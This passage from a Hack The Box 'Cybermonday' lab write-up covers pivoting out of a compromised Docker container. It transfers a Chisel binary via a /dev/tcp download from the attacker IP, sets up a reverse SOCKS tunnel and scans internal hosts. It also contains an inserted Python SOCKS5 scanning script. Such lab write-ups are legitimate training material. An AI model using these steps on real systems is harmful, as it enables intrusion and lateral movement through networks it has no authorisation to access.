Assessment
Upon gaining a foothold:
- a system enumeration attempt was made
- the foothold is inside a Docker container
- the /mnt directory is mapped to the home directory of a user in the host filesystem
- the john user is a valid system user, enumerated from /mnt/.ssh/authorized_keys
- the createLogFile action on the webhook API endpoint can be used to write to the /mnt/logs directory
- unable to proceed further from here
Based on the assessment above, I will perform a network scan of the container's network. Since the container lacks the tools I need, I will create a reverse SOCKS proxy with Chisel and route my tooling through it with proxychains.
Reverse Socks Proxy
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ nc -lvp 2222 < /home/kali/Tools/Chisel_1.7.7/chiselx64
listening on [any] 2222 ...
connect to [10.10.14.12] from cybermonday.htb [10.10.11.228] 39948
www-data@070370e2cdc4:/tmp$ cat < /dev/tcp/10.10.14.12/2222 > chiselx64
www-data@070370e2cdc4:/tmp$ chmod 755 ./chiselx64
Delivery complete
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ chisel server -p 55555 --reverse
2023/08/22 20:11:56 server: Reverse tunnelling enabled
2023/08/22 20:11:56 server: Fingerprint PSBeKE3cY8gMEMOec62HVPWh1n5xdToMlxwm02fQ4VU=
2023/08/22 20:11:56 server: Listening on http://0.0.0.0:55555
Start the Chisel server on the Kali port 55555
On Kali, I need to append the reverse SOCKS proxy (a socks5 entry for 127.0.0.1 on port 48823, the port bound in the next step) at the bottom of the /etc/proxychains4.conf file, so that it is the last entry in the proxy list.
www-data@070370e2cdc4:/tmp$ ./chiselx64 client 10.10.14.12:55555 R:48823:socks &
[1] 1440
www-data@070370e2cdc4:/tmp$ 2023/08/22 18:13:09 client: Connecting to ws://10.10.14.12:55555
2023/08/22 18:13:09 client: Connected (Latency 26.322678ms)
The command above asks the Chisel server on Kali to listen on port 48823 as a SOCKS5 proxy (the R: prefix marks a reverse remote). Anything sent to that port is tunnelled over the WebSocket connection to the client running in the container and exits from the container's network, effectively creating a reverse SOCKS proxy. Note that the port is opened on Kali, not on the Docker host.
Connected
Pivoting
www-data@070370e2cdc4:/tmp$ ./cdk ifconfig
2023/08/22 18:14:38 [+] run ifconfig, using GetLocalAddresses()
2023/08/22 18:14:38 lo 127.0.0.1/8
2023/08/22 18:14:38 eth0 172.18.0.5/16
[[Cybermonday_Automated_Docker#[CDK](https://github.com/cdk-team/CDK) - Zero Dependency Container Penetration Toolkit|CDK]] has a built-in ifconfig that I can use to check the network configuration
The container's address is 172.18.0.5 on the 172.18.0.0/16 Docker bridge network.
That subnet has 65,534 usable addresses, but Docker's IPAM hands them out sequentially starting at .1 (the gateway, i.e. the host side of the bridge), so 172.18.0.1-4 are the most likely neighbours given our own address of .5.
One caveat before scanning: proxychains only relays the TCP connect() calls it intercepts, so nmap has to run as a plain TCP connect scan (-sT, which is the default when nmap runs unprivileged, as the conn-refused lines below confirm). SYN, UDP and ICMP probes bypass the tunnel and never reach the Docker network.
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q nmap --top-ports 100 172.18.0.1-4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 20:48 CEST
Nmap scan report for 172.18.0.1
Host is up (0.080s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.18.0.2
Host is up (0.080s latency).
All 100 scanned ports on 172.18.0.2 are in ignored states.
Not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.3
Host is up (0.080s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.18.0.4
Host is up (0.080s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap done: 4 IP addresses (4 hosts up) scanned in 32.61 seconds
The 172.18.0.1 host is the bridge gateway, i.e. the Docker host itself; its open 22/tcp and 80/tcp match the initial recon of 10.10.11.228.
172.18.0.2 responds but exposes none of the top 100 ports.
Both 172.18.0.3 and 172.18.0.4 appear to be hosting web services.
172.18.0.1 and 172.18.0.3
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q curl http://172.18.0.1 -I
HTTP/1.1 301 Moved Permanently
Server: nginx/1.25.1
Date: Tue, 22 Aug 2023 18:51:59 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: http://cybermonday.htb
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q curl http://172.18.0.3 -I
HTTP/1.1 301 Moved Permanently
Server: nginx/1.25.1
Date: Tue, 22 Aug 2023 18:51:56 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: http://cybermonday.htb
Both 172.18.0.1 (i.e. 10.10.11.228) and 172.18.0.3 answer with the same nginx/1.25.1 redirect to http://cybermonday.htb, so they appear to be serving the same Laravel web app, with 172.18.0.3 presumably the container behind the host's listener on port 80.
172.18.0.4
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q curl http://172.18.0.4 -I
HTTP/1.1 200 OK
host: 172.18.0.4
date: Tue, 22 Aug 2023 18:52:45 GMT
connection: close
x-powered-by: PHP/8.2.7
set-cookie: PHPSESSID=1a1470ac78f099292e25f8596084dc15; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl http://webhooks-api-beta.cybermonday.htb/ -I
HTTP/1.1 200 OK
server: nginx/1.25.1
date: Tue, 22 Aug 2023 18:53:01 GMT
content-type: text/html; charset=UTF-8
connection: keep-alive
host: webhooks-api-beta.cybermonday.htb
x-powered-by: PHP/8.2.7
set-cookie: PHPSESSID=c0c7e19e78d4ac923accbf4149fcc3d5; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
The 172.18.0.4 host, by contrast, returns the same PHP/8.2.7 headers and PHPSESSID cookie pattern as the virtual host webhooks-api-beta.cybermonday.htb, so it appears to be the container hosting the webhook API. A direct check is to request 172.18.0.4 with the Host header set to webhooks-api-beta.cybermonday.htb and compare the body with the response from the public virtual host.
Remaining
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q nmap -sn -T5 --min-parallelism 100 --max-parallelism 256 172.18.0.5/16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 20:58 CEST
Debugging Increased to 1.
Debugging Increased to 2.
ultrascan_host_probe_update called for machine 172.18.2.86 state UNKNOWN -> HOST_UP (trynum 0 time: 3136716)
Changing ping technique for 172.18.2.86 to connect to port 80
Changing global ping host to 172.18.2.86.
Stats: 2:37:41 elapsed; 0 hosts completed (0 up), 4096 undergoing Ping Scan
Sweeping the remaining /16 this way failed: after more than 2.5 hours not a single host had completed. Every probe nmap sends is a TCP connect tunnelled through the SOCKS proxy, and each of the 65,534 addresses costs at least one full round trip through Kali and the container, so -T5 and the parallelism flags buy almost nothing here. A sweep of that size belongs inside the container, or should be restricted to the low addresses Docker actually allocates.
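The tunnel set up earlier (Chisel client with R:48823:socks, proxychains pointed at 127.0.0.1:48823) and the stalled /16 sweep above come down to one mechanism: proxychains intercepts nmap's connect() calls and turns each into a SOCKS5 CONNECT to the Chisel listener, which the client inside the container then completes from 172.18.0.5. The script below is an added example, not code from this write-up nor from Chisel or proxychains. It performs that handshake directly (RFC 1928, no-auth method) and runs a bounded connect scan over the first addresses of the container's subnet. The proxy address 127.0.0.1:48823, the port list, the worker count and the timeout are assumptions taken from the setup in this write-up.

```python
"""SOCKS5 CONNECT probes through the Chisel reverse SOCKS listener.

Added example: not from the original write-up, Chisel or proxychains.
ASSUMPTION: the Chisel server runs on Kali (chisel server -p 55555 --reverse)
and the container-side client bound R:48823:socks, so 127.0.0.1:48823 on Kali
is a no-auth SOCKS5 proxy whose exit point is the container (172.18.0.5).
"""
import ipaddress
import socket
import struct
from concurrent.futures import ThreadPoolExecutor

PROXY = ("127.0.0.1", 48823)  # assumed from the write-up's R:48823:socks
SOCKS_VER = 0x05

# RFC 1928 section 6 reply codes, mapped to the port states a scanner reports.
REP_STATE = {
    0x00: "open",         # succeeded: the container completed the TCP handshake
    0x01: "error",        # general SOCKS server failure
    0x02: "blocked",      # connection not allowed by ruleset
    0x03: "unreachable",  # network unreachable
    0x04: "unreachable",  # host unreachable
    0x05: "closed",       # connection refused: the target answered with RST
    0x06: "filtered",     # TTL expired: the exit side timed out
    0x07: "error",        # command not supported
    0x08: "error",        # address type not supported
}


def build_greeting() -> bytes:
    """Client hello: VER=5, NMETHODS=1, METHODS=[0x00 no authentication]."""
    return bytes([SOCKS_VER, 0x01, 0x00])


def parse_method_select(data: bytes) -> None:
    """Server picks a method; 0xFF means none of ours was acceptable."""
    if len(data) != 2 or data[0] != SOCKS_VER:
        raise ValueError(f"bad method-select reply: {data!r}")
    if data[1] == 0xFF:
        raise ValueError("proxy rejected no-auth (chisel's socks listener normally accepts it)")


def build_connect(ip: str, port: int) -> bytes:
    """CONNECT request: VER CMD=1 RSV ATYP=1(IPv4) DST.ADDR DST.PORT."""
    return bytes([SOCKS_VER, 0x01, 0x00, 0x01]) + socket.inet_aton(ip) + struct.pack("!H", port)


def parse_connect_reply(head: bytes) -> str:
    """First four bytes of the reply: VER REP RSV ATYP. REP decides the port state."""
    if len(head) < 4 or head[0] != SOCKS_VER:
        raise ValueError(f"bad CONNECT reply: {head!r}")
    return REP_STATE.get(head[1], "error")


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or fail; short reads are normal on a tunnelled socket."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def probe(ip: str, port: int, proxy=PROXY, timeout: float = 3.0) -> str:
    """One tunnelled TCP connect probe: we only ever talk to the proxy on Kali;
    the Chisel client inside the container performs the real connect()."""
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            s.sendall(build_greeting())
            parse_method_select(recv_exact(s, 2))
            s.sendall(build_connect(ip, port))
            return parse_connect_reply(recv_exact(s, 4))
    except socket.timeout:
        return "filtered"
    except (OSError, ValueError) as exc:
        return f"error: {exc}"


def docker_candidates(own_cidr: str, count: int) -> list:
    """Docker's bridge IPAM allocates sequentially from .1 (the gateway/host side),
    so the first addresses of our own subnet are the likeliest neighbours."""
    net = ipaddress.ip_interface(own_cidr).network
    return [str(h) for _, h in zip(range(count), net.hosts())]


def connect_scan(hosts, ports, proxy=PROXY, workers: int = 32, timeout: float = 3.0) -> dict:
    """Bounded-concurrency connect scan. Every probe is a full SOCKS round trip
    (Kali -> container -> target), so cost grows as hosts * ports * RTT / workers."""
    jobs = [(h, p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda hp: probe(hp[0], hp[1], proxy, timeout), jobs))
    return dict(zip(jobs, states))


if __name__ == "__main__":
    targets = docker_candidates("172.18.0.5/16", 10)   # 172.18.0.1 .. 172.18.0.10
    for (host, port), state in sorted(connect_scan(targets, [22, 80, 3306, 5000]).items()):
        if state == "open":
            print(f"{host}:{port} {state}")
```

Because each probe is a full SOCKS round trip via Kali and the container, the cost grows as hosts x ports x RTT, which is why the host-discovery pass over 65,534 addresses never completed; keep the host list small (sequential Docker IPAM makes .1 to .10 the right first guess) or scan from inside the container instead. Only TCP connect probes can travel this path: SYN, UDP and ICMP never go through connect() and would silently leave the tunnel.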
Tip
So I have been tipped off that other hosts are within the range of 172.18.0.1-10
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ proxychains -q nmap --top-ports 100 172.18.0.1-10
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 23:58 CEST
Nmap scan report for 172.18.0.1
Host is up (0.082s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.18.0.2
Host is up (0.081s latency).
All 100 scanned ports on 172.18.0.2 are in ignored states.
Not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.3
Host is up (0.082s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.18.0.4
Host is up (0.082s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 172.18.0.5
Host is up (0.081s latency).
All 100 scanned ports on 172.18.0.5 are in ignored states.
Not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.6
Host is up (0.080s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
3306/tcp open mysql
Nmap scan report for 172.18.0.7
Host is up (0.082s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT STATE SERVICE
5000/tcp open upnp
Nmap scan report for 172.18.0.8
Host is up (3.1s latency).
All 100 scanned ports on 172.18.0.8 are in ignored states.
Not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.9
Host is up (3.1s latency).
All 100 scanned ports on 172.18.0.9 are in ignored states.
Not shown: 100 closed tcp ports (conn-refused)
Nmap scan report for 172.18.0.10
Host is up (3.1s latency).
All 100 scanned ports on 172.18.0.10 are in ignored states.
Not shown: 100 closed tcp ports (conn-refused)
Nmap done: 10 IP addresses (10 hosts up) scanned in 58.12 seconds
Two additional hosts with services discovered:
- 172.18.0.6:3306
- 172.18.0.7:5000
172.18.0.8-10 also responded but exposed none of the top 100 ports. Note that the service names come from nmap's port-number table, not from fingerprinting: 3306 is probably MySQL, but "upnp" on 5000/tcp is just the default name for that port, so 5000 needs a service-version scan (-sV) or a manual banner grab before drawing conclusions.